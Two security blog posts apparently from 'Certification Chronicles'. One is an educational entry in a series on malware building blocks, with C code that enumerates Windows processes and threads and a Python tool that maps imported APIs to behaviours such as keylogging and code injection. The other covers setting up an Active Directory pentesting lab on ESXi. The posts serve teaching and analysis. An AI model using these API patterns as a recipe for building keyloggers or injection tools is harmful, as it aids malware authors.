I feel like I should confess. Why? Because I’ve fought with myself for the past hour debating how to spend this Friday evening. I 100% should be continuing my Malware Analysis Workbook to keep making steady progress in preparation for the exam. GREM should be fun, I’m looking forward to it & blogging about the entire experience. At the moment I really don’t feel like “analyzing” anything. I feel like doing! Attempting to make or break something. The brain wants what the brain wants. Here’s how I rationalize things to myself in these situations. If the thing that I’ve yet to figure out, whatever it is, is in some way, somehow related to what I should really be doing, then guess what, IT’S FINE. So shoot, let’s just start an entirely new series on something I totally just came up with.

I have come to understand that there are patterns in malware. But before that, ask yourself what exactly is malware? Here’s where I think the definition from Lenny’s course rings volumes. It’s incredibly non-technical and very subtle. “Malware is code that is used to perform malicious actions.” This leads you to the realization that it’s not per se the capabilities of the software but the intent of the person using or authoring it. We’ll stop right there because my purpose isn’t malware analysis in this post. (You can wait until I take the certification; I’ll be sure to blog about the entire process from the first day of the course through to the cert.) It’s about patterns, remember. So sir, what are these patterns you speak of?

Software is typically developed in a high level language & compiled into a binary executable. What’s the best language to develop in? I always enjoy this debate because I’ve played with most of them & can usually argue either way depending on the side my opponent takes. Truthfully it’s preference & how familiar the developer is with the language. Different jobs are accomplished utilizing different tools. Some popular high-level languages are C/C++, Python, Delphi, and Java. Now I purposely left out scripting and interpreted languages; I include Python just because it’s awesome & you can usually accomplish the same as with a compiled language. I know Java and the JVM so you don’t have to beat me up. The majority of malware is written in C/C++; you could also use Python with ctypes and then compile it into an executable, but let’s not account for that. It shouldn’t surprise you that malware needs to accomplish many of the same tasks as ordinary software. Things like reading and writing to disk, network communication, spawning child processes, allocating dynamic memory, painting to the screen, and the list goes on. Now these things individually aren’t particularly nefarious. But in groups you can get an idea of what it’s trying to do.

How do you leverage C to write malware? You leverage this surprisingly unicorn-like resource called the Windows API, documented on MSDN. It’s how you programmatically interact with everything in the Windows environment. And if you’re thinking they missed an inch, they didn’t! So much so, there’s a group of folks who scoured the entire API (documented and undocumented), pre-loaded binaries and DLLs and created LOL (Living Off The Land). To say that the API is rich would be an understatement. You can do any and everything with it, because what’s the point of having an Operating System if it’s not extensible & doesn’t account for each and every obscure thing a developer might ever want to do. Poor Microsoft.

Here’s an example: we get a malware sample and during static analysis we look at its imports and see function calls to GetKeyState, GetAsyncKeyState and SetWindowsHookExA. Very quickly you can get a feel for what it potentially might be, maybe without even visiting the documentation. In this case, potentially a keylogger. This is what I mean when I mention patterns above. This series will begin with the small building blocks before we go full blown into replicating our own malware. This is what I meant when I said I wanted to “attempt to make or break something”. Again, learning is a contact sport and maybe from failing & being stuck so much I don’t mind it. I haven’t developed professionally in years and if I do anything now Python’s usually my go-to. So pure C is a challenge I’m totally up for and I hope by the end I can say I improved. I’ve also never written a piece of malware nor its components. I encourage you to fight through the cryptic naming conventions, grab a C book if you need to, and just persevere. The best way is to just start. I spun up a VM specifically for developing, downloaded & installed the latest Visual Studio and off I went.
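As an added example (not the post’s own code), here is a small Python script that does what that static analysis step describes: it parses the import table of a PE32 file straight from the header layout, using only `struct`, and then groups the imported API names into behaviour patterns such as keylogging or process enumeration. The `PATTERNS` table is an assumed starting point rather than an authoritative rule set, and `build_sample_pe` constructs a minimal PE in memory so the script runs offline; on a real sample you would pass the file bytes to `parse_imports` instead.

```python
import struct

# Assumed behaviour patterns (illustrative, not an authoritative rule set):
# a pattern is reported when any of its APIs appear in the import table.
PATTERNS = {
    "keylogging": {"GetKeyState", "GetAsyncKeyState", "SetWindowsHookExA", "SetWindowsHookExW"},
    "process/thread enumeration": {"CreateToolhelp32Snapshot", "Process32First",
                                   "Process32Next", "Thread32First", "Thread32Next"},
    "network (C2 / downloader)": {"InternetOpenA", "InternetOpenUrlA", "URLDownloadToFileA",
                                  "WSAStartup", "connect", "send", "recv"},
    "code injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread"},
    "registry persistence": {"RegOpenKeyExA", "RegSetValueExA", "RegCreateKeyExA"},
}

def _cstr(data, off):
    """Read a NUL-terminated ASCII string at file offset `off`."""
    return data[off:data.index(b"\0", off)].decode("ascii")

def _rva_to_offset(rva, sections):
    """Translate a relative virtual address into a file offset via the section table."""
    for va, vsize, raw, rawsize in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + raw
    raise ValueError(f"RVA {rva:#x} is not mapped by any section")

def parse_imports(data):
    """Walk the import directory of a PE32 image and return {dll: [api, ...]}."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe = struct.unpack_from("<I", data, 0x3C)[0]            # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]        # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]   # SizeOfOptionalHeader
    opt = pe + 24                                           # optional header start
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    # PE32 data directories begin 96 bytes into the optional header; index 1 = imports
    imp_rva, _imp_size = struct.unpack_from("<II", data, opt + 96 + 8)
    sections = []
    for i in range(nsec):  # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        vsize, va, rawsize, raw = struct.unpack_from("<IIII", data, opt + opt_size + i * 40 + 8)
        sections.append((va, vsize, raw, rawsize))
    imports = {}
    desc = _rva_to_offset(imp_rva, sections)
    while True:  # IMAGE_IMPORT_DESCRIPTOR array, terminated by an all-zero entry
        oft, _ts, _fwd, name_rva, ft = struct.unpack_from("<IIIII", data, desc)
        if name_rva == 0:
            break
        thunk = _rva_to_offset(oft or ft, sections)  # prefer OriginalFirstThunk
        apis = []
        while True:  # thunk array ends with 0; high bit set means import by ordinal
            entry = struct.unpack_from("<I", data, thunk)[0]
            if entry == 0:
                break
            if entry & 0x80000000:
                apis.append(f"ordinal#{entry & 0xFFFF}")
            else:  # IMAGE_IMPORT_BY_NAME: 2-byte hint followed by the name
                apis.append(_cstr(data, _rva_to_offset(entry, sections) + 2))
            thunk += 4
        imports[_cstr(data, _rva_to_offset(name_rva, sections)).lower()] = apis
        desc += 20
    return imports

def classify(imports):
    """Group the imported API names into the behaviour patterns they suggest."""
    names = {api for apis in imports.values() for api in apis}
    return {p: sorted(names & apis) for p, apis in PATTERNS.items() if names & apis}

def build_sample_pe(dlls):
    """Constructed sample: a minimal PE32 whose single section holds only an import table."""
    SEC_RVA, SEC_RAW = 0x1000, 0x200
    blob = bytearray()
    def put(b):                           # append to the section, return the data's RVA
        off = len(blob); blob.extend(b); return SEC_RVA + off
    n = len(dlls)
    desc_rva = put(b"\0" * 20 * (n + 1))  # reserve the descriptors plus null terminator
    descs = []
    for dll, apis in dlls.items():
        name_rvas = [put(b"\0\0" + a.encode() + b"\0") for a in apis]  # hint + name
        dll_rva = put(dll.encode() + b"\0")
        thunks = b"".join(struct.pack("<I", r) for r in name_rvas) + b"\0\0\0\0"
        oft, ft = put(thunks), put(thunks)
        descs.append(struct.pack("<IIIII", oft, 0, 0, dll_rva, ft))
    blob[0:20 * n] = b"".join(descs)
    dos = bytearray(0x40); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<II", opt, 96 + 8, desc_rva, 20 * (n + 1))  # import directory
    sec = b".idata\0\0" + struct.pack("<IIII", len(blob), SEC_RVA, len(blob), SEC_RAW) + b"\0" * 16
    return (bytes(dos) + coff + bytes(opt) + sec).ljust(SEC_RAW, b"\0") + bytes(blob)

if __name__ == "__main__":
    sample = build_sample_pe({"USER32.dll": ["GetAsyncKeyState", "SetWindowsHookExA"],
                              "KERNEL32.dll": ["CreateToolhelp32Snapshot", "Process32First",
                                               "Process32Next", "CreateFileA"]})
    found = parse_imports(sample)
    for dll, apis in found.items():
        print(dll, apis)
    for pattern, apis in classify(found).items():
        print(f"[{pattern}] {', '.join(apis)}")
```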

Process & Thread Enumeration

I figured this was an awesome place to begin because it’s pervasive throughout malware. Possibly for anti-debugging, maybe to send off to a C2 as information gathering, or searching for vulnerabilities that may aid in privilege escalation. Whatever the reason, it’s widespread, gives me a reason to be writing this and is a friendly introduction to C. I will present the code & then explain it in plain English.

/* 1 */
#include <stdio.h>
#include <Windows.h>
#include <TlHelp32.h>
#include <tchar.h>

/* 2 */
BOOL GetProcessList();
BOOL ListAssociatedThreads(DWORD dwProcessID);

/* 3 */
int main(void)
{
	GetProcessList();
	return 0;
}

/* 4 */
BOOL GetProcessList()
{
	PROCESSENTRY32 process_structure;
	HANDLE handleToProcessSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); /* 5 */

	/* 6 */
	if (handleToProcessSnapshot == INVALID_HANDLE_VALUE) {
		_tprintf(_T("Failed To Obtain Handle To Process Snapshot\n"));
		return FALSE;
	}

	/* 7 */
	process_structure.dwSize = sizeof(PROCESSENTRY32);

	/* 8 */
	if ( !Process32First(handleToProcessSnapshot, &process_structure) ) {
		_tprintf(_T("Failed To Obtain Data About First Process - Last Error = %lu\n"), GetLastError());
		CloseHandle(handleToProcessSnapshot);
		return FALSE;
	}
	do
	{
		/* 9 */
		_tprintf(_T("\n\n====================================================="));
		_tprintf(_T("\n Process Name:  %s"),           process_structure.szExeFile);
		_tprintf(_T("\n Process ID:  0x%08lX"),        process_structure.th32ProcessID);
		_tprintf(_T("\n Parent Process ID: 0x%08lX"),  process_structure.th32ParentProcessID);
		_tprintf(_T("\n Thread Count:  %lu\n"),        process_structure.cntThreads);

		/* 10 */
		ListAssociatedThreads(process_structure.th32ProcessID);
		_tprintf(_T("\n\n====================================================="));

	/* 11 */
	} while ( Process32Next(handleToProcessSnapshot, &process_structure) );
	CloseHandle( handleToProcessSnapshot );
	return( TRUE );
}

BOOL ListAssociatedThreads( DWORD dwProcessID )
{
	THREADENTRY32 thread_structure;
	HANDLE handleToThreadSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPTHREAD, 0 );

	if ( handleToThreadSnapshot == INVALID_HANDLE_VALUE ) {
		_tprintf(_T("Failed To Obtain Handle To Thread Snapshot\n"));
		return FALSE;
	}
	thread_structure.dwSize = sizeof( THREADENTRY32 );

	if ( !Thread32First(handleToThreadSnapshot, &thread_structure) ) {
		_tprintf(_T("Failed To Obtain Data About First Thread - Last Error = %lu\n"), GetLastError());
		CloseHandle( handleToThreadSnapshot );
		return FALSE;
	}
	DWORD dwThreadCount = 1;
	do {
		/* only report threads whose owning process is the one we were asked about */
		if ( thread_structure.th32OwnerProcessID == dwProcessID ) {
			_tprintf(_T("\tThread ID-%lu: 0x%08lX\n"), dwThreadCount, thread_structure.th32ThreadID);
			dwThreadCount++;
		}
	} while ( Thread32Next(handleToThreadSnapshot, &thread_structure) );
	/* release the snapshot handle so it is not leaked on every call */
	CloseHandle( handleToThreadSnapshot );
	return( TRUE );
}

You may have noticed that I didn’t bother numbering the second function call. That’s because it’s basically identical to the first. I will illustrate the difference when we reach a piece that’s different.

  1. These are the imports. An import is just a library that holds tons of functions for us to call. They only exist to be used by us so long as we import them first. This makes them happy.
  2. Function declarations. These are used to help with compile time error checking. In this case it says we’re creating 2 functions that are of type Boolean (true/false), their respective names, and any arguments they may expect. It’s like an early warning system. For instance, if we began to write the function body (the one that takes an argument named dwProcessID) and we forgot to include it, the compiler understands from our declaration that it should be there. So it immediately complains, we call ourselves silly, correct it and move on.
  3. Main method. It’s the entry-point for the entire program. Execution starts here; you don’t need to think about it. We call our 1st function here and for clarity include the return statement.
  4. This looks similar to the function declaration but without the ; and with statements within the { } brackets. Inside these brackets is our function body (the purpose of the function).
  5. I like to think about a Windows Handle as a pointer to a system resource. It’s a more abstract level; for instance if you wanted to read a file, you’d call the appropriate function, obviously passing it amongst other things the filename. You wouldn’t get a file back or an object, you’d get back a Handle. Then for all further processing you refer to the handle. In our case we make a call to CreateToolhelp32Snapshot; this function comes from the TlHelp32.h import. We search MSDN and understand the arguments to pass it, one being TH32CS_SNAPPROCESS, which along with the 0 argument says, “Give me a handle to a snapshot of all the running processes on the system at this point in time”. In the 2nd function this call is also made again, but this time with a different 1st argument, TH32CS_SNAPTHREAD. Appropriately named, since the first function grabs all the processes and then we find each process’s associated threads.
  6. Error checking. From MSDN we know that if the call to get the process snapshot fails it’ll return the symbolic constant INVALID_HANDLE_VALUE. You could make a call to GetLastError() to further debug.
  7. Important. MSDN told me this. You need to set the size field of the structure before you make the call to the next function. If you don’t do this, the call automatically fails.
  8. Call to Process32First; this is how we actually make a call to get the first process. It takes as arguments the handle and the structure whose member we had to initialize. We put this call inside an if statement; if we encounter an issue we fall into the error printing statements included in that statement and close the handle so it’s not a stray.
  9. Success! If we reach here it means we’re good; we’ve gotten the data associated with our first process in the snapshot. That structure we set the size on is now populated with the relevant data returned from the function call. Some of those things are the process’s name, ID, its parent process ID, thread count and a host of other things. Break after the call to view all the relevant fields in the structure or just Google it.
  10. Determine which threads belong to this process. As mentioned earlier, that function is very similar except it takes a snapshot of all the threads, and then we compare the process ID we pass into the function to each thread’s owning process ID (th32OwnerProcessID).
  11. Notice the call to the Process32Next function as the continuing condition for the do-while loop. This function will move to the next process in the snapshot.

Here’s some output:

Excerpt of running the code.


Epilogue

We’re going to build up to something awesome I promise. Obviously this is for educational purposes only.
NOTE: If you want to compile the code just remove the numbers I included to explain the different sections.

Until next time!

The post The Usual Suspects – Malware Snippets – Part 1 appeared first on Certification Chronicles.

AD Amusement Park – Part 1

11 April 2019 at 04:47

WHO (Is This Geared Towards?)

  • Penetration Testers
  • System Administrators
  • Technology & System Enthusiast
  • Average Joe (Jill)
  • Anybody That Wants To Read!

WHAT (Will It Encompass?)

The design and provisioning of an AD Penetration Testing Lab created to mimic a corporate network. After which, we will simulate an adversary attacking the network using various techniques. Along the way we will spend time getting to know the key concepts of what being in a “Windows Environment” is all about.

This will be broken into multiple posts, each leveraging the previous one & building towards the next. Since this is meant to be comprehensive we will spend a significant amount of time (the initial few posts) constructing our lab. Once completed, we’ll detail as many Red-Team scenarios and Pentesting Techniques (or whatever we think is relevant/cool) on the network we created. There is no end in sight! Once I’m tapped out I will solicit friends & peers for techniques to illustrate. Did you catch I said we? That means you also. So do leave comments, email me, to keep this series rolling.

Note: In no way do I or will I ever claim to be an expert in anything. The best way for me to learn is by doing: making mistakes, trying/failing, and just persevering. With that said, my connections are experts in the topics I’ll speak about. If I misspeak or misrepresent anything, point it out, I’m totally open to constructive criticism.

WHEN (Does It Start?)

Aren’t you reading this right now? Duh. Just kidding, I plan on staying pretty consistent. Current date is 4/10/2019 19:12 EST. I would like to be done standing the lab up and be on to blogging about the scenarios by the beginning of summer at the latest.

WHY (Are You Even Doing This?)

  • Because I Have Unlimited Amounts Of Free Time? This couldn’t be further from the truth !! Let’s see I lead AppSec @ work, am preparing to take GREM, being a husband, being a sibling, being a resource, and being a friend.
  • Because I Get Paid For This? Yeah Ok! If anyone is paying then the funds have never reached me lol. Truthfully I still remember being broke waking up and not having a single dollar. I do pretty well nowadays and I’ll never let money motivate me! Imagine being purely driven by money, and then there’s no money left. That’s why I’ll never ask for a donation, a beer or anything similar. The best thing you could do for me is leave a comment (to help me make it better for the future) or share it with others. You’ll never see an ad on this blog. I take pride in this and it means a lot to me. One of the most valuable things you provide to someone is your time.
  • Because Why Not ?! Okay. Now we’re on to something. The thing to love about having a blog is being able to write about whatever the heck you want! If I wanted to fill this blog up with lavender bunny rabbits or Swedish meatballs, who could tell me not too? Nobody. Fortunately for you guys I’m not that weird! I made a promise to myself that I wouldn’t write to fill up the pages. This syndrome affects primarily new bloggers. After receiving warm fuzzy feedback on their blog, the human in them wants to just put out more post, sacrificing quality just to continue getting complimented. Being self aware is an amazing quality to have. So instead of quantity I focus on quality and content.
  • To Learn. Some of you know the path I took to get where I am currently. I skipped over an important role that most offensive & defensive folks get: System Administration & Networking. All my knowledge in those areas is self taught, mostly from books & hacking. It’s almost like my hobby now. Fun fact for me is that the more unknown something is to me, the more fascinating it is.
  • To Teach. I never want to be the guy that hoards information. Ever. I think it’s disgusting when people are afraid to share knowledge for whatever reasons. I also feel like I’m the perfect medium. Almost artistic, like a compiler, actually a decompiler. I take some input, perform some translations and modifications and do my best to convey it to you as output in a language that’s most familiar to you. Teaching is loaded because you’re constantly reinforcing what you already knew. So again I win.
  • To Be The Devil’s Advocate. We will look through both lenses, that of the attacker as well as the defender. I think this is necessary for completeness. Just think how wrapped up we get in colors and the box we place ourselves in. “I’m a Red-Teamer – I’m a Blue-Teamer – I’m a Purple-Teamer”. In reality there are 2 sides, the good guys & the bad guys. If you straddle the line, I consider you to be on the bad side. Simple.

Okay. With that out of the way – let’s start Part 1 of the series!

I’ll summarize exactly what we’re going to accomplish in this post first, then illustrate it in detail below.

    1. Summary/Disclaimer
    2. Physical System Requirements
      1. Recommendation & What’s in My Environment
    3. ESXI & Hypervisors
      1. Download, Installation, and Deployment
    4. Active Directory & Windows Domains

Summary/Disclaimer:

*Operation Manage Expectations* – Unfortunately or fortunately, every marathon starts with a single step. This is our single step. It sets the stage for all subsequent posts in this series. With it being the foundation, it’s one of the most important. What happens to anything built upon a weak foundation? We actually won’t do any hacking here. It’s meant to understand the core concepts and get a handle on getting your lab stood up. (I can hear folks sucking their teeth & heading for the EXIT)


Physical System Requirements:

First off, I don’t want to hear any chuckles, laughs or “bruhhh’s” after I reveal what I’m about to say. I’m running all this on a Dell Inspiron 3874 from back in the day! If you’re a person with a fancy beefy server so be it! More power to you. But if you’re more like me, loving to stretch the limits of anything you can touch on, then you can so-called “ball on a budget”. I laughed one day when I read people speculating on what type of equipment & devices I had in my lab. I was like damn this guy is going to be sadly disappointed when I inform him on the current state of affairs going on here lol.  So take what I’m going to list below w/ a grain of salt.

Processor – Depending on the generation I would say you can get away with having an I5 processor. Obviously the newer the better, to handle all the multitasking we’ll be doing and to utilize the advances in technology. Again my old I7 fourth gen does just fine. Ha!

RAM – One of the most important things in the entire stack. This depends on how big you want your environment to be honestly.  I would suggest 32GB and a minimum of 16GB. At the moment I have 12GB and I usually never see more than 50% usage at max load having 5 VMs running and all processing something.

Disk – Ideally you have a large SSD (1TB) and a small one (128GB) to boot from. My setup is slightly different. I had a 256GB SSD laying around and the desktop came with a 1TB HDD. So I boot the OS from the 256GB SSD and use the HDD for the VM storage. You actually could boot the OS from a flash drive of at least 4GB if you wanted. I did this before and experienced random hanging and freezing, so that’s why this time around I decided to use a physical drive.

My Powerhouse Dell Inspiron 3874

*IMPORTANT* You’re free to use whatever Hypervisor you want. I tried all the major ones and settled with VMware ESXI as my favorite. If you’re going to follow this post & build your lab accordingly, ESXI only works with Intel NICs. You’ll need to have one to avoid a situation where you have to patch the ISO to inject open-source (shady) drivers (kernel level rootkit?) into your build. Guess what? That desktop had a Realtek NIC. Irony. No worries, I solved this easily by buying and installing one of these.


ESXI & Hypervisors:

I’ll spare you the dictionary definition, which you’re welcome to find here, of what a Type 1 hypervisor is. Type-1 runs directly on the host machine’s hardware and doesn’t have to load an OS first. Compare this to Type-2, which most people are already familiar with; some examples are VirtualBox (yuck), VMware Workstation (if you’re fortunate) and VMware Player (if you’re fortunate & it’s the one of your liking).

So what does this do for us? Great question. When we leverage this type of hypervisor we’re able to utilize all of the host machine’s hardware for our VMs. First thing we do is head over and grab the latest ESXI image from VMware’s website, which at the moment is 6.7. YES – you have to create an account.

Downloading latest ESXI image

The ISO is surprisingly small for the sheer amount of magic that it provides. The next thing we want to do is burn the ISO to a USB flash drive. There are a few programs I’ve used for this over the years depending on OS, but the most reliable one has to be Rufus. Download and install (or run) it.

Insert your USB into the machine and run Rufus. You’ll have to point it to the ESXI ISO, it should detect your USB drive letter automatically. Similar to the following:

Writing ESXI image to flash drive

Writing the image should be quick, less than a minute. Unfortunately the only confirmation you’ll get from Rufus is a Windows chime and the progress bar visually reaching 100%; sorry, no message box popup confirmation.

Rufus finished writing image to flash drive

Now that we have our flash drive ready for battle, we insert it into the system we’re using for our lab. Sometimes you’ll hold F2 on system boot, or go into the BIOS, alter the boot order and select the USB to load prior to the Hard Disk. The process for installing ESXI is very simple, just click through honestly. But for the sake of completeness I wanted to detail it thoroughly. The initial load will show you some Linux booting output and switch to the following looking screen:

ESXI loading after booting from USB

Press “Enter” to continue with the installation when paused at the Compatibility prompt. Then F11 to accept the EULA. Continuing on, you’ll be prompted to select the disk you want to install ESXI on. If you’re dropping it on another USB, make sure it’s inserted; VMware should recognize it. DON’T MISTAKENLY OVERWRITE THE USB WITH THE INSTALLATION ON IT. No matter what, choose the correct disk; if you’re using an SSD or HDD just make sure you select the correct one. Remember this ISN’T the place where your VMs will be held, although it’s probably inside the same physical system. In my case, for illustration purposes, I’m installing on a VM so my disk is labeled as such, and looks like the following. (Multiple disks will be listed if applicable)

Installing ESXi on host disk.

Hit “Enter” to continue. Select your default keyboard layout, Swiss German in my case. JK – I selected “US Default” of course, and again “Enter” to continue. At the next screen you’re prompted for a root password; make it whatever you want so long as you remember it.

Selecting root password.

Confirm again that you’re pointing to the correct disk before you begin partitioning. (Can you tell I screwed this up before?)

Confirming partition to write to

A completed install looks similar to the following.

Completed ESXi install.

Great Progress! Remove the installation media and reboot.

To save time, here are the assumptions I will make:

  1. You already have at least one Windows Server edition to be your domain controller. Microsoft provides 180-day evaluation copies that you can download directly from them: Server 2016 Download. You’ll have to fill out the form (bogus information) to initiate the download. Get creative 🙂
  2. You have at least one client to add to your domain. This could be any Windows OS like 10, 8 (you’re weird), 7 or XP. You can get Windows 10 for free using their Media Creation Tool here. Get creative finding the other editions.

If all went well you’ll boot up to the following:

ESXi installed & running.

Take note of the IP address ESXi presents to you and browse to it. It should be bridged to your LAN. Note: My address is NAT’d since I’m simulating the process on a VM. Not that you should have realized that anyway. From this point on you can disconnect the monitor if you like; all the rest of the administration is done through the web application.

Accepting the self-signed certificate shows the following:

ESXi Web App Login

After logging in, your main dashboard provides a bunch of system information about your physical host and configuration options for your future lab. To deploy a VM, we first have to upload an ISO. In ESXi terms, the storage that houses the ISOs and the resulting VMs is called the datastore. Things are pretty intuitive, actually, because the upload to the datastore is streamlined into the Create/Register VM workflow. Click that button:

ESXi Dashboard

Select “Create a new virtual machine” and click Next as follows:

Deploying a new VM

Give your VM a recognizable name & select the OS version from the dropdown. I named mine DC-2K-16 just to be descriptive: I know it’s going to be my Domain Controller, and the OS year is in the name. Do whatever makes you happy:

Select VM OS and naming it

You’ll select a datastore, click Next, and be presented with the final screen.

VM Provisioning almost complete

Note: We still haven’t uploaded our ISO to the datastore yet. Now is the time. Click “Browse” in the location row. This opens the datastore browser; there you’ll click “Upload” and then browse your local system for the Windows Server 2016 ISO.

As it’s progressing things should look like this:

Be patient – this is where you get to pause and reflect on your tremendous efforts thus far.

After that finishes, do yourself a favor and upload your other ISO, the Windows 10 one, as well. In my case I had a Windows 8.1 32-bit ISO already downloaded, so that’s what I used. To simulate a corporate network I’d suggest at least 9 machines. You’re going to upload until your thumbs hurt, haha. You’ll also need a pfSense ISO, which will be our virtual firewall; you can grab it from here and upload it like the other images. Download your ISOs from wherever you’re finding them, upload them to the datastore, and repeat. Repeat until you’re close to the setup I have below.

Back at our dashboard we can now see our VM list has grown from 0 to 1. Click on it and select Power On. This will load the VM and install Windows like we’ve done a thousand times before. Repeat the process for all your client machines. This is the part that takes the most time, so you can upload a bunch and go to sleep or something.

Note: I am switching from the virtual environment where I was demonstrating the installation process to my actual ESXi server. The one you laughed about earlier, smh.

You should now have the beginnings of an AD pentesting lab. Mine looks like the following:

Enough VMs to make you jealous

Active Directory & Windows Domains

An Active Directory domain is a collection of objects within a Microsoft Active Directory network. An object can be a single user, a group or it can be a hardware component, such as a computer or printer. Each domain holds a database containing object identity information.

Active Directory domains are grouped in a tree structure; a group of Active Directory trees is known as a forest, which is the highest level of organization within Active Directory. Active Directory domains can have multiple child domains, which in turn can have their own child domains. Authentication across domains within Active Directory works through transitive trust relationships.

Active Directory domains can be identified using a DNS name, which can be the same as an organization’s public domain name, a sub-domain or an alternate version (which may end in .local). While Group Policy can be applied to an entire domain, it is typical to apply policies to sub-groups of objects known as organizational units (OUs). All object attributes, such as usernames, must be unique within a single domain and, by extension, an OU.

That was a mouthful. Let’s try to explain it in layman’s terms. A domain is simply a group of computers or devices that can be managed centrally. A domain controller is the Windows Server machine in the environment that responds to authentication requests from other systems on the domain. This server implements the Active Directory roles/responsibilities, stores all the user account information for the domain, enforces the security policy, and can run the domain’s DHCP & DNS servers.
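To make those terms concrete, here is an added PowerShell example (not from the original post) that maps each concept above onto what a domain actually reports. It assumes the domain already exists and that it runs on the DC or on a domain-joined box with the RSAT ActiveDirectory module; the username checked at the end is a constructed sample.

```powershell
# Added example: read back domain, forest, trusts, DCs and OUs from a live AD
# Assumes the RSAT ActiveDirectory module is available on this machine
Import-Module ActiveDirectory

# The domain: identified by a DNS name (often ending in .local) plus a NetBIOS name
$domain = Get-ADDomain
"Domain DNS name : {0}" -f $domain.DNSRoot
"NetBIOS name    : {0}" -f $domain.NetBIOSName
if ($domain.ParentDomain) { "Parent domain   : {0}" -f $domain.ParentDomain }
else                      { "Parent domain   : (none, this is a forest root)" }

# The forest: the top of the tree, and every domain living inside it
$forest = Get-ADForest
"Forest root     : {0}" -f $forest.RootDomain
"Domains in forest:"
$forest.Domains | ForEach-Object { "  - $_" }
"Child domains of this domain:"
$domain.ChildDomains | ForEach-Object { "  - $_" }

# Trusts: the (transitive) relationships that cross-domain authentication rides on
"Trust relationships:"
Get-ADTrust -Filter * |
    Select-Object Name, Direction, ForestTransitive, IntraForest |
    Format-Table -AutoSize

# Domain controllers: the servers answering authentication requests
"Domain controllers:"
Get-ADDomainController -Filter * |
    Select-Object HostName, IPv4Address, IsGlobalCatalog |
    Format-Table -AutoSize

# Organizational units: the sub-groups Group Policy is usually applied to
"Organizational units:"
Get-ADOrganizationalUnit -Filter * |
    Select-Object Name, DistinguishedName |
    Format-Table -AutoSize

# Usernames must be unique within a domain, so check before creating an account.
# With -Filter, Get-ADUser returns nothing (no error) when there is no match.
function Test-SamAccountNameFree {
    param([Parameter(Mandatory)][string]$SamAccountName)
    $existing = Get-ADUser -Filter "SamAccountName -eq '$SamAccountName'"
    return ($null -eq $existing)
}

# Constructed sample name; True means no such account exists yet
Test-SamAccountNameFree -SamAccountName 'jdoe'
```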

Feel free to read, Google, and pause if you want to research any of these topics in depth. For now just accept that this is all you need. I’ll give you everything else that’s pertinent exactly when it’s required. This is enough to get us off the ground and running.

Here’s what I hope you learned from this post:

  1. My motivations to start this series & what I hope to accomplish
  2. You can deploy a pretty nice lab for close to nothing if you have the time
  3. How to write ISOs to flash drives, if you’ve never done it before
  4. How to install an ESXi server
  5. How to install VM OSes inside your ESXi server
  6. A little bit about Active Directory & Windows domains


For the next post I have the following agenda:

  1. Configuring our first DC
  2. Promoting the server to a DC
  3. Installing the Active Directory roles & responsibilities
  4. Installing the DNS role
  5. Installing the DHCP role
  6. Configuring OUs
  7. Joining a client to our domain
  8. Learning about GPOs
  9. Setting up our pfSense firewall

Until next time!

The post AD Amusement Park – Part 1 appeared first on Certification Chronicles.
